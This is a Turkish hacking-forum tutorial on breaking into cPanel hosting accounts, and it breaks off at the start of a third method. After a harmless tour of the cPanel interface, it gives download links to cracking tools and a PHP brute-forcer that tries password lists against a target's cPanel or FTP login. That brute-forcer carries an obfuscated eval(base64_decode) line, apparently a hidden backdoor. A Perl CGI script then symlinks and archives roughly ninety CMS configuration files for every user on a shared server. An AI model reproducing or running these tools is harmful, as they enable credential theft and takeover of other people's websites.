C-Panel Hacking Cracking Geniş Anlatım + Resimli Videolu

( Control Panel Hacking Cracking ( C-Panel Hack Crack Nasıl Yapılır – C-Panel nedir ne işe yarar nasıl hacklenir – Geniş Anlatım – C-Panel Account Kasmak – C-Panel Admin ve Şifreleri nasıl bulunur ? )
Merhaba arkadaşlar ben KingSkrupellos. Bugün Size C-Panel bir diğer ismiyle Control Panel Hack nasıl yapılır hangi malzemeler kullanılır yani kodlar. Bazı kodlar alıntıdır. Konuya uygun olarakda youtube’dan videolar koymak istiyorum. Dileyen istediği gibi yararlansın.İlk önce C-Panel Nedir ve kısayol tuşları nedir onu görelim daha sonra aşağıda kodları verdim hack crack yöntemi ile yapıcaz inşallah. Yazıların bazıları alıntı olup bazılarını ise yeniden derleyip toplayıp bir daha yazmaya gayret ettim.  Nette araştırdığım ve kendi eklemiş olduğum tüm dosyaları bir araya getirerek hazırladım. Belkide nette görebileceğiniz en büyük dökümanı hazırlamak istiyorum sizlere. Bu anlatımlardan sonra lütfen başka soru sormayın her şey burada okuyun uygulayın o kadar.
Videolu Anlatımlar =>
[code]http://www.youtube.com/watch?v=HJfid2LHmrY
http://www.youtube.com/watch?v=HGWIUL0EKek
http://www.youtube.com/watch?v=25T2TUJ1xjU
http://www.youtube.com/watch?v=HnS2PspdEcs
http://www.youtube.com/watch?v=DiS1gvT6j6A
http://www.youtube.com/watch?v=MO61DoIHTMA
http://www.youtube.com/watch?v=IDS_B-lfGQg
http://www.youtube.com/watch?v=3rFQ9LZQMjo
http://www.youtube.com/watch?v=KhlM4xhbdMg
http://www.youtube.com/watch?v=8Cqh6ndcqJ0[/code]
Local FTP and C-Panel Cracker Program İndir =>
[hide]http://www.mediafire.com/download/nyj33y9vckcl9xp/Local.FTP.Cpanel.Cracker.rar[/hide]
Not 1 => Cpanel kırmak için genelde perl ile yazılmış exploitler kullanılır.
Resimli olarak anlatıma geçelim.
Aşağıda verdiğim kodları indirme linkleri =>
[code]http://www.mediafire.com/?4pm551dxidq6zc2
http://www.mediafire.com/?r4kkj92ij77r1sf
http://www.mediafire.com/?s58tulka2kmu1d7
[/code]
Cpanel Nedir? => Cpanel (Control Panel) Linux sunucularda host müşterilerinin, webmasterların işlemlerini görsel ve interaktif olarak yapmalarına Cpanel Arayüzü
Cpanel İle Ne Yapılır?
Site ve sistem ayarlarını kolayca yapmanızı sağlayan Cpanel aşağıdaki imkanları sağlar.
•	Site adresine özel email hesabı açar ve yönetirsiniz.
•	Site dosyalarınızı yükler ve yönetimini yaparbilirsiniz.
•	Veritabanı kurulum ve Phpmyadmin erişimi sağlar
•	Hazır CMS sistemleri (WordPress, forum vs) bir tıkla kurulur
•	Yedekleme yapabilir, varolan yedekleri yüklersiniz.
•	Sitenizin trafiğini görebilirsiniz. (Analytics önerilir)
•	Sitenize SSL kurma işlemleri ve güvenlik adımları
•	Alt domain, yönlendirme ve park işlemleri
•	C-Panelde açık bulunursa cracklenir ve hacklenir daha nolcak.
Eğer C-Panel Şifrenizi unuttuysanız şu işlemi yapabilirsiniz.
Hosting şifrenizi sıfırlamak/değiştirmek için salladımbirsite.com’a müşteri girişi yaptıktan sonra Hosting hesaplarım düğmesini tıklayınız.
Alan adınızın yanındaki Yönet düğmesine tıkladıktan sonra açılan sayfadaki Giriş Bilgileri bölümünden şifrenizi değiştirebilirsiniz.
Not: cPanel ve FTP kullanıcı adı ve şifreleri genelde aynıdır daha sonra shelli sok file managerdan o iş tmm.
Cpanel Arayüz :
1- Home, Ana sayfa kısayolu ile herhangi bir menü içinden en kolay şekilde ana sayfaya dönebilirsiniz. Logout, Çıkış ile cPanel'den güvenli olarak çıkabilirsiniz.
2- Bu satırda yönettiğiniz domain adını ve son olarak bağlandığınız adresi görebilirsiniz. IP adresiniz sabit ise bu ilgiyi takip ederek sizden başkalarının cPanel'e erişmediğine emin olabilirsiniz.
3- General account information, Genel hesap bilgileri ile hosting hesabınıza ait kullanım bilgilerini görebilirsiniz.
4- cPanel menu, bu menü ile hosting hesabınızla ilgili bilgilere ulaşabilir, işlemlerinizi yapabilirsiniz.
5- General server information, Genel sunucu bilgisi ile sunucu ve yazılımlar ile ilgili detaylara erişebilirsiniz.
Main Domain : Site isminiz
Homde Directory : Sitenizin bulunduğu dizin
Last login from : Son giriş yapan ip adresi
Disk Space Usaga : Kullandığınız Alan / Sizi verilen alan
Monthly Bandwidth Transfer : O aya ait kullanılan bant genişliği / toplam bant genişliği ( Aylık Trafik )
Email Accounts : Kendi domaininiz uzantılı elektronik posta adresi ( admin@siteismi.com )
Subdomains : Alt alan adları ( oyunlar.siteismi.com )
Parked Domain : Parkedilen domainler ( Tek siteye birden çok domain için )
Ftp Accounts : Ana FTP dışındaki diğer FTP hesaplarının sayısını gösterir
Sql Databases : Oluşturduğunuz veritabanları ( Örnek ; forum için , portal için )
Mailing Lists : Mail Listeleriniz..
Hosting package : Hostingden aldığımız paket ismi
Server Name : Siteyi barındırğımız server adı
Cpanel Version : Kullandığımız Cpanel in sürümü
Cpanel Build : Panelin kaç kez derlendiği
Theme : Cpanel in teması
Apache version : Apache web sunucusunun sürümü
Php version : Php dilinin sürümü
MySql : Sql in Sürümü
Shared IP adres : Paylaşılan ip adresi
Path to sendmail : Mail için dosya yolu
Path to perl : Perl kullanımı için dosya yolu
Service Status : Servis durumunu gösterir
Mail Bu bölümde ; domaininiz uzantılı mail hesabı açabilir , silebilir , değiştirebilir , okuyabilirsiniz.
Yeni Bir Mail Hesabı oluşturmak için ;
Email Accounts yazan yeri tıklıyoruz.Karşımıza aşağıdaki pencere gelecek.
Email : Nicki yazıyoruz
Password : Şifre
Password ( Again ) : Şifreyi tekrar yazıyoruz
Mailbox quato ( Optional ) : Kaç mb olacağını belirliyoruz.
Create butonuna tıklıyoruz ve mail hesabını oluşturmuş oluyoruz..
Hemen alt kısımda , var olan adresleri görüyoruz.
Account : Mail hesabı
Quota : Alanı
Function : Şifre değiştirme , alan artırma ve mailleri yazılım yardımıyla okumak için ayarlar ( Outlook gibi )
Access WebMail : Maillerinizi , web üzerinden okuyabilirsiniz.Bu sekmeyi kısa bir cümle ile geçiştirmeyip detaylı olarak inceleyelim ;
Okumak istediğimiz postanın yanına gidip , Access Webmail tablosundaki küçük simgesi tıklıyoruz.Gelecek olan pencerede şifreyi soracak.Şifremizi girip , login diyoruz.
Mail Using SquirrelMail & yazanı tıklıyoruz.Ve gördüğünüz gibi mailler okumanız için sizin yolunuzu gözlüyor : ) Üstteki read ile okuyup , delete ile silebilirsiniz.
Bu bölümde ; Dosya transfer işlemlerinizi yapabilir , yedek alabilir, ftp hesabı açabilirir, dosyalarınızın ne kadar yer kapladığını görebilirsiniz.
Backup : Sitemizin yedeğini alacağımız yer.Belkide Cpanel deki en önemli kısım : ) Hostinginizde meydana gelebilicek bir sorun veya sitenize yapılacak bir saldırı karşısında mutlaka elinizde yedekleriniz olması lazım.Bilmelisinizki ; sitemin başına bişey gelse bile elimde yedeklerim var.
Mutlaka duymuşsunuzdur ; full backup yedek diye.İşte meşhurrr full backup u buradan alıyoruz.Tanışın ve kaynaşın : ) Fazla heyecan yapmayın : ) Sadece datalardan oluşan bi dosya : ) Neyse , işin şaka kısmını bi kenara bırakalım.Full Backup ; adı üstünde her şeyin yedeğini almak demek.Hostinginizde bulunan veritabanı,resimler,forum,portal,script ne varsa.Size tavsiyem her hafta sonu mutlaka düzenli bir şekilde yedek alın.
Altındakiler ise ; veritabanınızın yedeği , sitenizin bulunduğu klasörün yedeği.Full Backup alırsanız bunları indirmenize gerek yok.Eğer ayrı ayrı alacaksınız olabilir.Örneğin ; forumun veritabanını indirip , başka bir foruma kurabilirsiniz.Ya da yine veritabanını indirip ; phpmyadmin yardımı ile sadece üyelerin olduğu tabloyu alıp kendi sitenize taşıyabilirsiniz&
Kenardaki kısım ise , daha önceden aldığınız yedeği geri yüklemenize yardımcı olacaktır.
File Manager : Eğer FTP yazılımlarını kullanmıyorsanız , bu kısımdan hostunuza dosya transferi gerçekleştirebilirsiniz.
Disk Space Usage : Hangi dosya ne kadar yer kaplıyo.Mb olarak görebilirsiniz.
Ftp Accounts : Size hosting in verdiği ana ftp hesabıdır.Yani size tüm klasörler ve izinler açıktır.Bunun haricinde başka ftp hesaplarıda oluşturabilirsiniz.Küçük bir örnek verirsem daha iyi anlayacaksınız ; video siteniz var.Video sitenizde basketbol,futbol,voleybol bölümleri mevcut.Ve bunlara maçların videolarını upload ediyosunuz.İşte buradan kısıtlı bi ftp hesabı açıp sadece basketbol bölümünü görmelerini sağlayabilirsiniz.Görevli kişi sizin verdiğin hesapla bağlandığında sadece basketbol klasörü gözükecek.Diğerlerinin üstünde asla oynama yapamayacak.
Burada önemli olan Directory kısmı.Az önceki örnekte olduğu gibi hangi klasörün görüleceğini buradan ayarlıyoruz.Ve son create deyip , ftp hesabımızı oluşturuyoruz.
Daha önce açılmış ftp hesaplarını ve hangi klasörleri görme izni olduğunu gösterir.Yine kenardaki küçük simgleri tıklayak ayarlarla ilgili değişiklik yapabilirsiniz.
Logs => Bu bölümde ; sitenizin trafiğini kontrol edebilir , hata raporlarını görebilir , ftp durumunu inceleyebilirsiniz.
Bu bölümde ; klasörlerinize şifre koyabilir,internet protokol numarasını yasaklayabilirsiniz.
Ip Deny Manager : Bölüme girdiğiniz karşınıza çıkan ekrana ip adresini yazıp , add dediğinizde yasaklamış olursunuz.Bunu hangi durumlarda yaparız ; sitenizin loglarını kontrol ettiğinizde bir ip adresinden devamlı atak çekildiğini görürüz.Ve o ip adresinin atak yaparak sitemizi yavaşlatmaması için , yasaklarız.
Domains
Bu bölümde , alt alan adı oluşturabilir , yeni domain ekleyebilir veya varolan domaine , ikinci bir domain daha atayabiliriz.
SubDomains : Domaininize ait , alt alan adı açmak.Örnek xx.net ubdomain xx.net
Yani domainin başına eklenir ve subdomain diye geçer.FTP ye girdiğinizde dostlar adında bir klasör oluştuğunu göreceksiniz.İçeriğini istediğiniz gibi yapabilirsiniz.Eğer bir klasörü subdomain olarak tanımlamazsanız , / işareti ile ulaşabiliriz.Örnek xx.net
Büyük bi ihtimalle ne demek istediğimi anladınız : )
Addon Domains : Bu pakete ek bir domain eklemek.
Parked Domains : Yine kullandığınız pakete ek bir domain daha eklemek
Bu bölümde , adından da anlaşılacağı gibi veritabanı oluşturuyoruz.Portal kurmak , forum kurmak , toplist kurmak veya kendi yazdığınız scriptler için Sql veritabanına ihtiyacımız varsa , hemen bi tane oluşturuyorsunuz.
MySql Databases
Veritabanı oluşturmak için kullanılır.Burada dikkat edeceğimiz nokta oluşturduğumuz veritabanının ismine dikkat etmemiz.Örneğin ;foruminci.net. Yapılan veritabanı ismi forum..Tam ismi ; inci_forum şeklindedir.Buna dikkat etmezseniz , ilk günden hostingdeki kişilerin delirmesine yol açabilirsiniz : )
PhpMyAdmin
Veritabanını oluşturduğumuzda üzerinde sorgu çalıştırmak, tablo eklemek,optimize etmek , yedek almak gibi işlemleri phpmyadmin in kolay arayüzü sayesinde basit bi şekilde yapabilirizolanak sağlayan, popüler, lisans gerektiren bir web hosting kontrol paneli uygulamasıdır.
[img]http://hizliresimyukle.com/images/2014/08/19/1d4ff7.png[/img]
[img]http://hizliresimyukle.com/images/2014/08/19/2cbfa0.jpg[/img]
[img]http://hizliresimyukle.com/images/2014/08/19/3f2786.jpg[/img]
1.	YÖNTEM
[code]<html>
<head>
<link rel="shortcut icon" href="Linj">
<*** http-equiv="Content-Language" content="en-us">
<*** http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<title>Cpanel Kırıcı</title>
<style>
input,
.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
</style>
  <style type='text/css'>
  <!--
       A:link {text-decoration: none; color:#cccccc }
       A:visited {text-decoration: none; color:#cccccc }
       a:hover {text-decoration: none; color:#000000}
  -->
</style>
<?php
@ini_set('memory_limit', 1000000000000);
$Baglanti_zamanasimi=5;
@set_time_limit(0);
$submit = $_REQUEST['submit'];
$kullanicilar = $_REQUEST['users'];
$sifre = $_REQUEST['passwords'];
$Hedef = $_REQUEST['target'];
$ayar = $_REQUEST['option'];
$sayfa = $_GET['page'];

if($Hedef == ****){
$Hedef = 'localhost';
eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==**));}?>
<?php
 print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%** bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%**>
<br><b><center><a href=**?umutunsayfası=bilgi'>Bilgiler</a> - <a href=**?umutunsayfası=nonom'> Brute </a> - <a href=**?umutunsayfası=Kullanıcılar'> Kullanıcı Adlarını Çek..</a><br><br></center></td></tr></table>";
 if ( $sayfa == 'bilgi' ){
print
"<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
<br><b>Kullanıcı Adı Ve Şifreleri Giriniz !<br>
<br>
pass ********<br>
Giriş Başarılı<br>
Hala Yapım Aşamasında...<br>
<br><font face=tahoma><br>
<font color='red' >Cpanel Kırıcı</font><b><br><br>
</center><br></td></tr></table>";
 }elseif( $sayfa == 'nonom'){

@ini_set('memory_limit', 1000000000000);
$Baglanti_zamanasimi=5;
@set_time_limit(0);
$submit = $_REQUEST['submit'];
$kullanicilar = $_REQUEST['users'];
$sifre = $_REQUEST['passwords'];
$Hedef = $_REQUEST['target'];
$ayar = $_REQUEST['option'];
if($Hedef == ****){
$Hedef = 'localhost';
}
print " <div align='center'>
<form method='post' style='border: 1px solid #000000'><br><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%** bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
<b> Yaz Hedef Siteni :D.  </font><input type='text' name='target' size='16' value= $Hedef style='border: font-family:Verdana; font-weight:bold;**></p></font></b></p>
<div align='center'><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%** bgColor=#303030 borderColorLight=#666666 border=1>
<tr>
<td align='center'>
<b>Kullanıcı Adı:</b></td>
<td>
<center>
<b>Paraola</b></td>
</center>
</tr>
</table>
<p align='center'>
<textarea rows='20' name='Kullanıcı Adları** cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$kullanicilar</textarea>
<textarea rows='20' name='Parola' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$sifre</textarea><br>
<br>
<b>Seç Birini -- </span><input name='ayar' value='cpanel' style='font-weight: 700;** checked type='radio'>Cpanel
<input name='option' value='ftp' style='font-weight: 700;** type='radio'> Ftp :):):) <input type='submit' value='Başa' name='submit' ></p>
</td></tr></table></td></tr></form><p align= 'left'>";
?>
<?php
function ftp_check($host,$Kullanici,$sifre,$zaman_asimi){
$b3 = curl_init();
curl_setopt($b3, CURLOPT_URL, "ftp://$host");
curl_setopt($b3, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($b3, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($b3, CURLOPT_FTPLISTONLY, 1);
curl_setopt($b3, CURLOPT_USERPWD, "$Kullanici:$sifre");
curl_setopt ($b3, CURLOPT_CONNECTTIMEOUT, $zaman_asimi);
curl_setopt($b3, CURLOPT_FAILONERROR, 1);
$data = curl_exec($b3);
if ( curl_errno($b3) == 28 ) {

print "<b> Bağlantı Hatası :(</b>";
exit;}

elseif ( curl_errno($b3) == 0 ){

print
"
<b> Kullanıcı Adını Bulduk..<font color=**#FF0000'> $Kullanici </font> Ve Şifresi;
<font color=**#FF0000'> $sifre </font></b><br>";}curl_close($b3);}

function cpanel_check($host,$user,$sifre,$zaman_asimi){
$b3 = curl_init();
curl_setopt($b3, CURLOPT_URL, "http://$host:2082");
curl_setopt($b3, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($b3, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($b3, CURLOPT_USERPWD, "$user:$sifre");
curl_setopt ($b3, CURLOPT_CONNECTTIMEOUT, $zaman_asimi);
curl_setopt($b3, CURLOPT_FAILONERROR, 1);
$data = curl_exec($b3);
if ( curl_errno($b3) == 28 ) {
print "<b> Bağlantı Hatası :(</b>";
exit;}
elseif ( curl_errno($b3) == 0 ){

print
"
<b>Kullanıcı Adı Bulundu <font color=**#FF0000'> $user </font> Şifrede Bulundu
<font color=**#FF0000'> $sifre </font></b><br>";}curl_close($b3);}

if(isset($submit) && !empty($submit)){

$KullaniciListesi = explode ("\n" , $kullanicilar );
$parolalistesi = explode ("\n" , $sifre );
print "<b>Başladım Bismillah...</font></b><br>";
foreach ($KullaniciListesi as $Kullanici) {
$_kullanici = trim($user);
foreach ($parolalistesi as $parola ) {
$_parola = trim($parola);
if($ayar == "ftp"){
ftp_check($Hedef,$_kullanici,$_parola,$Baglanti_zamanasimi);
}
if ($ayar == "cpanel")
{
cpanel_check($Hedef,$_kullanici,$_parola,$Baglanti_zamanasimi);
}
}
}
}
}elseif ( $sayfa == 'Kullanıcılar'){
echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
echo **<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="**.htmlspecialchars($dosya).**"><input type="submit" name="hardstylez" value="grab !"></form>**;
$dosya = $_POST['file'];
$level=0;
if(!file_exists("file:"))
    @mkdir("file:");
@chdir("file:");
$level++;

$umutrengi = @explode("/", $dosya);

for($a=0;$a<count($umutrengi);$a++){
    if(!empty($umutrengi[$a])){
        if(!file_exists($umutrengi[$a]))
            @mkdir($umutrengi[$a]);
        @chdir($umutrengi[$a]);
        $level++;
    }
}
while($level--) chdir("..");
$b3 = curl_init();
curl_setopt($b3, CURLOPT_URL, "file:file:///".$dosya);
echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
if(FALSE==curl_exec($b3))
die(**Üzgünüm **.htmlspecialchars($dosya).** Dosya Piyasada yok :Ç**);
echo ** </textarea> </FONT>**;
curl_close($b3);
print **</table>**;
}
?>[/code]
Kullanımı gayet basit. Word list yükleyin. Sitenin cpanel linkini örnekteki gibi yazın. Admin login ismini bilmeniz gerekiyor. php scripti kullanan sunucularda script hataya ugratılarak cok rahat bıcımde admın logın elde edılebılır. Bildiginizi varsayarak oraya da onu yazıyoruz. Success koda dokunmuyoz.
Start diyoz. programı kendı halıne bırakıoz. Bulunca duruyor ve sıfreyı gosterıyor
2.	YÖNTEM KOD YÖNTEMİ
[code]#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sy_Config</title>
<style type="text/css">
.newStyle1 {
 font-family: Tahoma;
 font-size: x-large;
 color: #000000;
 background-color: #C0C0C0;
 text-align: center;
}
</style>
</head>
';
sub lil{
    ($user) = @_;
$msr = qx{pwd};
$kola=$msr."/".$user;
$kola=~s/\n//g;
symlink('/home/'.$user.'/public_html/includes/configure.php',$kola.'1.txt');
symlink('/home/'.$user.'/public_html/os/includes/configure.php',$kola.'2.txt');
symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$kola.'3.txt');
symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.'4.txt');
symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.'5.txt');
symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$kola.'6.txt');
symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$kola.'7.txt');
symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$kola.'8.txt');
symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'9.txt');
symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'10.txt');
symlink('/home/'.$user.'/public_html/members/configuration.php',$kola.'11.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.'12.txt');
symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'13.txt');
symlink('/home/'.$user.'/public_html/forums/includes/config.php',$kola.'14.txt');
symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'15.txt');
symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'16.txt');
symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'17.txt');
symlink('/home/'.$user.'/public_html/wp/wp-config.php',$kola.'18.txt');
symlink('/home/'.$user.'/public_html/WP/wp-config.php',$kola.'19.txt');
symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$kola.'20.txt');
symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'21.txt');
symlink('/home/'.$user.'/public_html/press/wp-config.php',$kola.'22.txt');
symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$kola.'23.txt');
symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$kola.'24.txt');
symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.'25.txt');
symlink('/home/'.$user.'/public_html/news/wp-config.php',$kola.'26.txt');
symlink('/home/'.$user.'/public_html/new/wp-config.php',$kola.'27.txt');
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'28.txt');
symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'29.txt');
symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$kola.'30.txt');
symlink('/home/'.$user.'/public_html/home/wp-config.php',$kola.'31.txt');
symlink('/home/'.$user.'/public_html/protal/wp-config.php',$kola.'32.txt');
symlink('/home/'.$user.'/public_html/site/wp-config.php',$kola.'33.txt');
symlink('/home/'.$user.'/public_html/main/wp-config.php',$kola.'34.txt');
symlink('/home/'.$user.'/public_html/test/wp-config.php',$kola.'35.txt');
symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'36.txt');
symlink('/home/'.$user.'/public_html/include/db.php',$kola.'37.txt');
symlink('/home/'.$user.'/public_html/connect.php',$kola.'38.txt');
symlink('/home/'.$user.'/public_html/mk_conf.php',$kola.'39.txt');
symlink('/home/'.$user.'/public_html/include/config.php',$kola.'40.txt');
symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'41.txt');
symlink('/home/'.$user.'/public_html/protal/configuration.php',$kola.'42.txt');
symlink('/home/'.$user.'/public_html/joo/configuration.php',$kola.'43.txt');
symlink('/home/'.$user.'/public_html/cms/configuration.php',$kola.'44.txt');
symlink('/home/'.$user.'/public_html/site/configuration.php',$kola.'45.txt');
symlink('/home/'.$user.'/public_html/main/configuration.php',$kola.'46.txt');
symlink('/home/'.$user.'/public_html/news/configuration.php',$kola.'47.txt');
symlink('/home/'.$user.'/public_html/new/configuration.php',$kola.'48.txt');
symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'49.txt');
symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'50.txt');
symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$kola.'51.txt');
symlink('/home/'.$user.'/public_html/includes/config.php',$kola.'52.txt');
symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'53.txt');
symlink('/home/'.$user.'/public_html/central/configuration.php',$kola.'54.txt');
symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$kola.'55.txt');
symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$kola.'56.txt');
symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$kola.'57.txt');
symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$kola.'58.txt');
symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'59.txt');
symlink('/home/'.$user.'/public_html/supp/configuration.php',$kola.'60.txt');
symlink('/home/'.$user.'/public_html/secure/configuration.php',$kola.'61.txt');
symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$kola.'62.txt');
symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$kola.'63.txt');
symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$kola.'64.txt');
symlink('/home/'.$user.'/public_html/panel/configuration.php',$kola.'65.txt');
symlink('/home/'.$user.'/public_html/host/configuration.php',$kola.'66.txt');
symlink('/home/'.$user.'/public_html/hosting/configuration.php',$kola.'67.txt');
symlink('/home/'.$user.'/public_html/hosts/configuration.php',$kola.'68.txt');
symlink('/home/'.$user.'/public_html/configuration.php',$kola.'69.txt');
symlink('/home/'.$user.'/public_html/submitticket.php',$kola.'70.txt');
symlink('/home/'.$user.'/public_html/clients/configuration.php',$kola.'71.txt');
symlink('/home/'.$user.'/public_html/client/configuration.php',$kola.'72.txt');
symlink('/home/'.$user.'/public_html/clientes/configuration.php',$kola.'73.txt');
symlink('/home/'.$user.'/public_html/cliente/configuration.php',$kola.'74.txt');
symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$kola.'75.txt');
symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.'76.txt');
symlink('/home/'.$user.'/public_html/manage/configuration.php',$kola.'77.txt');
symlink('/home/'.$user.'/public_html/my/configuration.php',$kola.'78.txt');
symlink('/home/'.$user.'/public_html/myshop/configuration.php',$kola.'79.txt');
symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$kola.'80.txt');
symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.'81.txt');
symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.'82.txt');
symlink('/home/'.$user.'/public_html/Settings.php',$kola.'83.txt');
symlink('/home/'.$user.'/public_html/smf/Settings.php',$kola.'84.txt');
symlink('/home/'.$user.'/public_html/forum/Settings.php',$kola.'85.txt');
symlink('/home/'.$user.'/public_html/forums/Settings.php',$kola.'86.txt');
symlink('/home/'.$user.'/public_html/upload/includes/config.php',$kola.'87.txt');
symlink('/home/'.$user.'/public_html/up/includes/config.php',$kola.'88.txt');
symlink('/home/'.$user.'/public_html/2/configuration.php',$kola.'89.txt');
symlink('/home/'.$user.'/public_html/2/wp-config.php',$kola.'90.txt');
}
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
  read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
} else {
  $buffer = $ENV{'QUERY_STRING'};
}
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
  ($name, $value) = split(/=/, $pair);
  $name =~ tr/+/ /;
  $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $value =~ tr/+/ /;
  $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $FORM{$name} = $value;
}
if ($FORM{pass} eq ""){
print '
<body class="newStyle1">
<p> Symlink All Configs </p>
<p> :::Put The File Content ( /etc/passwd ) Here :::</p>
<form method="post">
<textarea name="pass" style="width: 543px; height: 420px"></textarea>
<br />
<input name="tar" type="text" style="width: 212px" /><br />
<input name="Submit1" type="submit" value="submit" style="width: 99px" /><br />
</form>';
}else{
@lines =<$FORM{pass}>;
$y = @lines;
open (MYFILE, ">tar.tmp");
print MYFILE "tar -czf ".$FORM{tar}.".tar ";
for ($ka=0;$ka<$y;$ka++){
while(@lines[$ka]  =~ m/(.*?):x:/g){
&lil($1);
print MYFILE $1.".txt ";
for($kd=1;$kd<18;$kd++){
print MYFILE $1.$kd.".txt ";
}
}
 }
print'<body class="newStyle1">
<p>Done !!</p>
<p>&nbsp;</p>';
if($FORM{tar} ne ""){
open(INFO, "tar.tmp");
@lines =<INFO> ;
close(INFO);
system(@lines);
print'<p><a href="'.$FORM{tar}.'.tar">Click here 2 download tar file</a></p>';
}
}
 print"
</body>
</html>";[/code]
3.	YÖNTEM =>

[code]<?php /* || Idea :: Mr.Alsa3ek || Programming :: G-B || Designer :: Al-Swisre || 